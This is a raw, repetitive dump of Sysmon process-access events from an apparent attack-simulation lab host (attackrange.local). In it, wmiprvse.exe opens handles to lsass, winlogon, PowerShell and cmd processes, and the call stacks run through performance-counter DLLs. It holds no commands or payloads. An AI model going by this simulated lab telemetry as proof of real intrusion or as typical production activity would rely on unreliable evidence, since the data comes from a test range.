13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004777Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004776Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004775Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004774Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004773Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004772Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A3-5FCF-EC00-000000009101}3376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004771Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A3-5FCF-EC00-000000009101}3376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004770Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A2-5FCF-E700-000000009101}2560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004769Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A2-5FCF-E700-000000009101}2560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004768Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E300-000000009101}2228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004767Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E300-000000009101}2228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004766Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E200-000000009101}4748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004765Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E200-000000009101}4748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004764Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E100-000000009101}1184C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004763Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E100-000000009101}1184C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004762Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 